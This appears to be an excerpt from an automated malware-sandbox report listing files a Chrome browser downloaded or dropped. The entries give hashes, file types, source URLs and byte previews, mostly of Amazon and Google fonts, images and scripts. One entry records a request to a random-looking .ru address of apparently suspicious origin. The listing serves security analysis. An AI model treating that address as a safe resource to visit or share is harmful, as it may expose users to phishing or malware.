                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 17336, version 1.655
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):17336
                                                                                                                                                                          Entropy (8bit):7.986832176880709
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:B39E082C6B983705892045FD87E0B9A8
                                                                                                                                                                          SHA1:9CC1BB64EB270135F1ADF3A4881C2EE5E7C37BE5
                                                                                                                                                                          SHA-256:CB0F25CA005489D2399434C33762F291BD8746714EAE3AA72DE20ACA08EDC458
                                                                                                                                                                          SHA-512:DDBB8B598854DD829BEFB27641B1C56F23FCE55283D3FA33F0BFDA1C3B38CE7DC03A799E84902C580BA8A54361D33A49038368C96D9FCDE6A50FE83514774D17
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/WOnTLzkiaEccV7F.woff2
                                                                                                                                                                          Preview:wOF2......C...........CS........................?FFTM..8.....@.`..~........!.6.$..F..<.. .....a?webf...5l.......?..`..0p....{..Tj....?%........X.....,..UU.o.J(x...g.HK.I..EW.....<...o.RS.,.D.[Xv.s^SW.<..Y0...@..e...t*...J$%?..BGb.axC.....hc.P...z7/.m...=!........LET.K...N....W..DOc.x~..>!...."V...D.*.v."..tQ.*t.?OG..y3.../.F..qB.%..@..\..*y.2w.7GKB..7).1..p^u...MJ...O.D......m..3..1....5..,...!..x|8Xo.y.!..A w.T...'2.M^&/''...V.D*.Hl......$..D".JeR.L*..d"t...6}.c.2.Zkx.....!A%.q...b....$XJ..SJ...01&*..X.../.@..n....o...........ow.......$.RB.7...L.Ip.........dOU.......O.w.....Y.[k[.^MR ...v...6...>.........uYZ[.-k...Y.L.@...j...../r..`g>..C..R.rw%..`...p.&q..)(.......z...-H..N....)rI%.B..C.B..K.*..u...2.E.t.g.>....?..7._....Z.~....t.'.bj.`.|M.g..fi.X..D.HU.e.Yz..t....dk.t.0...1r.R.v.E.........}....I.?.....%.T.;.`!,.o....B..^.z....b.!BB$Dd.....a}.j!.+..A.A...4"M#"..9..el......A.j..#?"...}...."..#...8k..._.x..|...c........5.H...."-..a.p.p?..b..K....~.*..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1050x420, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):20182
                                                                                                                                                                          Entropy (8bit):7.891511075452795
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:FE3D69BDF14B6181B4EC1ACDFD7D9C37
                                                                                                                                                                          SHA1:9D57C9C21748195ED0F1D31B3FEC2A11EAD248EA
                                                                                                                                                                          SHA-256:3601DAAB40B973843349FE70B1B4218A79FEA14856E329BB5CF11DB9A788D449
                                                                                                                                                                          SHA-512:65A4042642E3AFB21DCE90EEDBAB40CCBE6199AE6389CA3887CE19B718A05691F47FE4C527757D058076CF560A488EB820732603E59B70187EBE580EF2A83C70
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4....................................................................."hIV..C:!D...,.]DJ.Z.,...X.X.:"P.R.X..d,.D..P....@D..e%.sR.....R.BP.d,.(R...A.K....k4.Bh.:.B.fh..MUg5I-Xh.....Bgbgp.B5..7Y...&...jS:..!I.KI.VmFh..5..A5.l..u.i.rk.{.?....jk.....}..|........k.o....}.?F........}#...?O.....S=.P.V.Il&.[.T....[L.L-35.9..K..L....RgT...t.wLNHe.F...ua-.7a.Tb......z.+L.$h..E..E..J...#Y..[...)o..+...]...~..H..}.#.....7.....}...x....<.......<..O..#...?.....Ec.PXM.n.gTcV....&....a..j.hL.;.&..n..........a........rC3.$.....e..'.....3......;.}i/.5..{....s<s.OqO....o.....z..s.8.!....oI.-...xT...~.=.5s.-..2...?X...?.}K......(.]N.L..||...../...=...r....;y.....:..w>'.......jt...|..y..|vv.fzF.yn.lb.....q.]S..kG..0..c.S..0.j.8...q.A....q.N9.19.3.8.,8....nHq.A.y.Y.'.<=<.1...xk|.I..../
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (609)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):26743
                                                                                                                                                                          Entropy (8bit):5.347138627237308
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                          SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                          SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                          SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets
                                                                                                                                                                          Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2879
                                                                                                                                                                          Entropy (8bit):7.84869020928119
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:59843D94DB955D9F79A7795A4D5F4E9E
                                                                                                                                                                          SHA1:EE36D09FBF049023BBB8BA166CCE803C7D28DB18
                                                                                                                                                                          SHA-256:39AF25E367EA661C64A284977B00021421925FDB168268883C51CE0F04732BC1
                                                                                                                                                                          SHA-512:91EF428F678B211169C99DF8FB2454F37993537587FDCABC1C6A2433B4C4394FD94D4BA425F9D6F1FC97E67F83234331C1228502BA09E34729337C2EB6FFB0D4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1."AQ..q23Bab...#R...S.................................................1..!"Aa............?....(..(..(..y...@k...y.E.`w.E......K..[T.... ..H.e.....i.{..?............F......z.".l.t.{w.O..y..JH.u..................5....Ksr.8...........Y.Jt.\..O#l.#..r..$j....TO.u.uk.&......~K.q.;"...5..<x|......].\.w.y....F..'[.a/)...................l~..E.ku*f5$A.y....vf?N{.B.Oe.......Y.....c.8...k|jwVV.V...j......d..tl..............m.......4....s..+.......{5X/..lz...o....."^........}....].........uu.X.8l..#.}.W.....{.8.5..V....P...Y..L...f..5.%)J.)J.)J.)J.EV/..Eo.....,!.....>.?......xi.f.8y...H. {.!.z.U.G.V.u..YL.-...x].....B3R#..k.E..L...Q@ER....*..l.y.;.w/.I!.6`......9..GP].....p..=...#?..7.k\..5....]I0.(`b.pe..fX.}.M....N.+....4.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 14940, version 1.0
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):14940
                                                                                                                                                                          Entropy (8bit):7.987709153796886
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:A46FB7AAE99225FDFD9D64B2B8B1063F
                                                                                                                                                                          SHA1:1EE50BF5985C1956DDE1C06D9B1CEC4645DDB92B
                                                                                                                                                                          SHA-256:4B5816BBFC52587979139951355FE4048DA02CE60E40CEF8E4A1EFB6CD396281
                                                                                                                                                                          SHA-512:4D981728548E5AF03C71AC0209D4F669D109558B369B0CBCC6BBFA1C32B43D1358B0322F65CFDF6E286EEB743081E6804C5B58292DBA4FC34BA76171FB3B716E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://fonts.gstatic.com/s/montserrat/v26/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw5aXo.woff2
                                                                                                                                                                          Preview:wOF2......:\.......d..9...........................6..\..r.`?STATH..F.......[.....6.$..B. ..|......'.5l.F.;........x..T)..g............Y...U..A.. Lr.v/..s.a..|....wX.O:.w...IBP.=...$.F...kK.p..Wz...|;...E2.'Y......V.r!.\..S.....+.\..-|.rN.<.....\...f%..He....y..{.c.d..E...z...F]{..^e.E..4..R..T...M._.K...Z.B.R1....(.cE.0X[.?......w.{g.}..D< .K...0..e.......X.I. M!Xxi...m.....a]:..zo...A...H1UQ....X..-[97 @.@.25...............t...E...]..$...S..]..iuKV\.m-...t..{...&dTnuL.*.."....h.Z$.+"z.....~.......$.S9T*....CB.Dx...7......?-......x.H..g..8g...I..[...RT.......`d.....5 YC.......3.....Fy........m*.Rt[.[.)..v..m...<....u9....S..f.Qrv...s...K..1@.A....BY..@,.......N_....N... .....x..8 ..>.;..,.5...F....F...i..':..$.Io$c$..?.....g.3.)C..........aD..{..DU.L...X...!."..Q.....$..I.O..!....4.....C...$.P.*p....`.SO5.>Z....g.n8..B...*+PN.J...#..|......>._.`:.?u.&...k@..!.1.2.a. ......?F.(..x`d.. (...C.......7...E[9.t.L.k..7.S...o..n.o..u.,....U....p$...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):4200
                                                                                                                                                                          Entropy (8bit):7.886889293224735
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:4C61EB2C63E5C2AF285145BB8B74752D
                                                                                                                                                                          SHA1:EB148B1E21354E5AB4B9C60C103C2E5AF4C89CFF
                                                                                                                                                                          SHA-256:9F2B9CA53CFF969821C792A6121BC108E649DE79D6299D64BB92DFC1C244FF08
                                                                                                                                                                          SHA-512:2A601DBA2DFD7089BBCB79E1C852F68CBC403AC05B2523C6BB175F618053CF82508F3A36C7272BE366029668EE44DAB06424BD7EAA23377DE70D99E10C866C38
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-M2UzMDBmNmIt-w186._SY116_CB412108494_.jpg
                                                                                                                                                                          Preview:......JFIF.....H.H.....C.............................!......!!!!!!!!''''''.....4444444444...C...........6%.%66666666666666666666666666666666666666666666666666......t...."........................................G.........................!.1A."Q..2aq...#Bc....%6RSbr...s...$35C...................................../.........................!1Q.."Aq..2Ra..#3...............?..D@..F.:.................D@...DD....D@...DE..j..c..3..4<.......}).5d.oB......u.&..i..vG.|o.T.j........:.........+U3.rr..ggEU.'.x'.M."..g.....8...Yr..9...]D....8UFy..O@....\..u..^.V....-eS..{.#.z ........q..........UUt.c.&..{....}.yuL....~*.!....0.zOw....!..!.w....J......V..-...G.....9kw..E.[y..1Q9x...m.....ghFt...[..SQ.N.1...$..*y...".\x'...s..=n......V..$..i%q{.`.w'....`...n..Km4....=&.JrM...j..t.J."..d""...." ...""....(.w......\.T.......A.5.KK..@......W...t.G.iy.^w.d.k1.s@..o..lG.rx.r.........72.,..:.a...v.~.{<t..B.....Tvt.S..v.w;)..5..`..,.4..Y(j%x....C's.1....Y..........
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2641
                                                                                                                                                                          Entropy (8bit):7.802611157766169
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:32BB36DC05797B0D7BB0CDAB044ABF02
                                                                                                                                                                          SHA1:A20765DE3D0E1026192E094310F3FCC8F464FF10
                                                                                                                                                                          SHA-256:3EDB04C196F083739667AD602EE031EBD82BB8B8855CE38F37AA94BE74293F1A
                                                                                                                                                                          SHA-512:E45D0D80AC509F9166C40B3A11E1BDAD7AD2A55F9F48B952C55E8A3D9A88552CC156C7C2A7A1B1010784D46F040AF1C665CB8654B2D9F4A08C93FAC34660E453
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1AQ."2q..#RaB.....$c................................................1!A..Q............?...........0..Qi.A#7..H..w....b&...'K.H9..[.1:..M......ooD.j..f...C.G.4......uG...-.&...............1...b[...+@~.@...f.g..W.....VG!Q#.......(...u.a$.Ow<...'m.&>.....:.......l{R.@...UPw.9.n|.C..3Q..x...C<.#X...x.. ...=.q.i.t...&m.......]....dH./Ke...c.ad.W.}k..V....P....k8MkY...$pS.............O...k7.y.K{..sNUGz..............dz....P....Ek.O...J..@..Of.Yc....3.M..d.|.U..v.G..~i.i>=...5.=[.|<..h.&..]..{...=.k.............-J..ePI>.J....h.r./;.._llE....z...>"....._v.98......im..p-.NHW. 2.0Y+W.@U.lS}...>..4u?W.llF.T.me.....D.Vf..5c.B...'...^.{/....6.7....0.7.C.4...%.2r3)....v..;.r..n....F65.zn...:4....q2.Z.0...[op..Y.F..#%.sR.O.u...{r;H.ek.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 27920, version 1.19661
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):27920
                                                                                                                                                                          Entropy (8bit):7.99242211313595
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:0F85A003B4D8AFBFEDD8118278061C34
                                                                                                                                                                          SHA1:245045FA7DE5DF027437F47209A5ADD3B48108A1
                                                                                                                                                                          SHA-256:AFF8DAE3B2DD2A0FD5C5CE60670CBBCA15A1F5BFAFCD70D13AD002EF920920F3
                                                                                                                                                                          SHA-512:69206330B785407D74A86D2916A13BC1311DC52218BE3B9F4629971E540D9C2FA6ECE1B2AF82404858242728B6F4079677187D3DED6524C550B2B4F8FD42E8B4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/Dv1WQ5DdeMS5qP7.woff2
                                                                                                                                                                          Preview:wOF2......m.......C...l...L.......................z......\.`..J.........4..-.6.$..<..`.. ..8. ..[T#...G..L......p.....t..9M.~.yVJ.../.n.U%.L......r..c...PU....7... ......P.F.c.),..b..Z.[m..f.B....}...x,..I..Fe.....n..;......Jv+......7......^.[%;...N.........)......1@..........&.....t.].1....B.}.>.}8Y.|...../.....n.M......$....k5.K.....Ju+isv........b.$.q.`...EF.IV.'O....z....+0..-....}.......8.c...8D.1C....%...Hlb.X61s..m..f,.6....s..)%.cD...6..`.d......Q... ..(....xr..66.z.z6.J=..._{.>7.]..`.$....R..91C.lBC.....M....V.../q..D....c:...FP..X.$."xP.;........ .F..I.kNm...."T..O.M.u...M/....}...,..-O..@)Pt.(....g{*dO..1..o.L...<...Mx..v...F.H...L.........f\H_..}....M.6.BN........3}.X9..s...w.N..b#......:w...`...".=.......i0....7S.......T?...s.J.'...UN.{Fr..5...^....4.k..#L>V.'.s..;6.]........x..q..|||...D*.J...r.y8..O....$....>.?.q...A.*?..|jn$5.". .K9.?....1.1T"..=0Y..CS...]*..O_.L-.m...8.....eW.w>H.Lfs...v.b0;;...8......!.g......%..P....
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16616, version 1.655
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):16616
                                                                                                                                                                          Entropy (8bit):7.986966282975233
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:4AFCD3B79B78D33386F497877A29C518
                                                                                                                                                                          SHA1:CC7EBAA05A2CD3B02C0929AC0475A44AB30B7EFA
                                                                                                                                                                          SHA-256:CDED49F94FC16DC0A14923975E159FBF4B14844593E612C1342C9E34E2F96821
                                                                                                                                                                          SHA-512:2DC9FFF1D57D5529C9C7BFF26FA9F3F94ADC47E9CEF51D782E55ECF93045200140706AB5816DFD4A0B49B8DB2263320FA2F0FA31A04E12D0C91FEA79B127255D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/pDxWAF1pBB0dzGB.woff2
                                                                                                                                                                          Preview:wOF2......@........l..@.........................?FFTM..8..z..@.`..~.....P..9.6.$..F..<.. ..,..a?webf....5l.F..VU..#7.Q...d......k...r....{.T....2KuI.1.+j...(..kvf8...7.+.&.....t..!Z..C...>..=.....v.9_.% .L.....z..........0.e....;.7>.d..S..[..&/....=.9w.n...=.FH.h$...<....s.s.F..`...c....@...}.MP.@.A`T+..J.,F..XT....@..c......TH....OZ..u.....V..u..g...#..~"...Df.\M..-...n.Cu..{f..@.b{B...x......2..;.B...Ah.).....m...Q`!V.IH.pG...T.mb..p.[.v....Z=..P...I.,....m....;..Hva.*..@..x..:.....=&'G. ..0.....Mi...LC...t6..N5..m.........TH.....mY#..g..#.$...7..}...cS{..!.'..n..3...0......lw..D.,l..x...hH.I..lZ.]...4h/..>-A...wAv....W..KeYj{.V[c..d...d/..1.g.(:..5......h.(;@..........0..]+my.qdQ.>..JGu5.v2.3/.)..h.I2.P.. ....P..l......UU..#.d......R..x...)..d...2.....ov..%'..R5.97jA.._...m#..:.Z..r..5.!1.a.`..o.\<.4..j..._.......+Y)E......."A$..-._........c.C-.\....C../C..>..;T.@K...aB.o}t.>..~...>............uP|..\|.....1.. x....-%.....<>.$M..(..e......Un.rf0
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2459
                                                                                                                                                                          Entropy (8bit):7.773202505765292
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:9ACFC70C73C81EDF49C053BD561E457E
                                                                                                                                                                          SHA1:39FF0ED0EA662B9BD0DF215C03BED98BC0939FDB
                                                                                                                                                                          SHA-256:AF51AA74C20F9BA123782B6061B655E2BA41C1B8987FA7A79167DE344859B757
                                                                                                                                                                          SHA-512:C6A5FE987DE1387E9F4C286A9D1AD4C0E3E68722E0A2DF6F404E031B4369CFEDC52EB88E806D6541C600C5DA938628C593E1DE17166822A72E4686BC4CF6BB9E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1"2AQ....3BUaqrs...4Rb...t....5CEc.............................................!"1..............?...D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.E..VB..#...K.....IA..........b..:.Os.R....$..&..v.c....,.`..."y..'...:.Pi....[...o..o..kF.i...CbO....j%.%ff....7k.!.PA..W>f.w#..!UOy...N.,.;NA.._...\.1.....:JIo..{.]L ;.k.A... ""." "/...N........%EC.q......>_..7.|..C!......s.LNj..R....f`O....Q.Y-C...!.H........ .,.j.m.KA[..^B.......G6.l...U]..AS,...2`.......h.n..$q..W..B......7,`;.u....Z`ig*L....6V...h.C./..~.U...3.xV7..Q...p....y5.(.O..J_..$.c'...*..e.d4..f...#......w@.A..i'...(.l..C{N.$a...b..e......%..`...nL..k...A.... a./..:.Tr...w.,-y.U3...C..m....3*$...T../i..~R...c......#..'Q.W.$.>A..rm...:.6.W..ohT5t.../h......K..G.?...............Zu..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):71
                                                                                                                                                                          Entropy (8bit):4.19644707821733
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                          SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                          SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                          SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1565
                                                                                                                                                                          Entropy (8bit):7.521041636504085
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6F9A777601024AE03365BA0E0988FD1A
                                                                                                                                                                          SHA1:38BD59A035AC0E1FE6879E8D95BDEF9DDB30DA9E
                                                                                                                                                                          SHA-256:1B39175CE496EDD203AC09DE255D97996FCC83494E5226D3F897B410CEB6EB90
                                                                                                                                                                          SHA-512:418CBEE6E57CB2AB0BCEBEE551C2FEEF49E5D0488E8E1E6B6B5737F65F80B34EE313FD3DEFB8CF6AE50571CAC144A1E2D3EB4CFCB9055BA8171CFB446CAC4CB2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........v.....................................................!1Q..".#ARaqr....DS..$2Ccs.................................................?..." ""." "".,..n.j..,....8=....8pv...-!ax..mS.....)'t.M.y.l..j...p.................8\;.N......6.4M=..@.@.=.>.5.)..o.g.....'`.$u..^.=...r.:.Q.....w.{.2G?x..t...HA.;$.....s..0C,............g..Mu.?..V?......t..D@DD.D@DD.D@DY.(9..K...$...d..P.. ...^0q.......`.0...P.)<............}.~\.....76.m...8.A#.x...\...i...U4...o;&}. 0.H&4e..-......d...}^.g..." ""." ""." (.CW#c.....q.29..7M/....W..J..Z.3......7.....9...3..'...(!n..cZ...... eR,X.].^q...+.C.......I.......Fg!.......!......[...r ...{...?..(%...............@_.g.[.p.....l,.J~c...........9.8..m....UY.......L~r;i...."..AM.3.+..t...O........\J.i..U7..........l...V..D@DD.D@DD.D@[3.Z...q}.7..z.?.t.nVeX.j.4..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (736)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):15646
                                                                                                                                                                          Entropy (8bit):5.450600723232336
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:8392970EEA0F830BBC895972877268D9
                                                                                                                                                                          SHA1:80BCFB5B6FD3CC381ECA66AF3198D07409DF7719
                                                                                                                                                                          SHA-256:03694046AA91EC24E3EA537EA683D273F151649E308A3FE4F5852C839AF74639
                                                                                                                                                                          SHA-512:DADE4B5269B0B1A12C36C96D495D3EDD6C5D800C81E29153FFD4C1F5136EA3A0923B12EDF1226C00D1C7E14F79020770CAD413C350D4653051078CA596A6BB73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.Dv_TT86KXl4.es5.O/ck=boq-one-google.OneGoogleWidgetUi.xexmpZqkioA.L.B1.O/am=QKBgwGw/d=1/exm=_b,_tp/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHu61g-i-YBZiLcGm3tURf4VJO5hyA/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:QIhFr;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.zt=function(a){var b=0,c;for(c in a)b++;return b};_.At=function(a){if(a.Rd&&typeof a.Rd=="function")return a.Rd();if(typeof Map!=="undefined"&&a instanceof Map||typeof Set!=="undefined"&&a instanceof Set)return Array.from(a.values());if(typeof a==="string")return a.split("");if(_.fa(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.Ba(a)};._.Bt=function(a){if(a.Te&&typeof a.Te=="function")return a.Te();if(!a.Rd||typeof a.Rd!="function"){if(typeof Map!=="undefined"&&a instanceof Map)return Array.from(a.keys());if(!(typeof Set!=="undefined"&&a instanceof Set)){if(_.fa(a)||typeof a==="string"){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.Ca(a)}}};.var Ht,It,Kt,yea,Lt,uea,tea,xea,vea,Mt;_.Ct=function(){var a=_.wl(_.Rd("w2btAe"),_.vl,new _.vl);return _.cl(a,1)};_.Dt=function(){return _.Rd("Im6cmf").string()};._.Et=function(a){this.o=
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://kia.jaishict.ru/bgbspkviowgzlbcmeGAbaXYUWYSSZIWBMAREHNWASTQAGRPKOKVJHMGPDLYGZOHQPAETDJPXRYIXP
                                                                                                                                                                          Preview:1
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
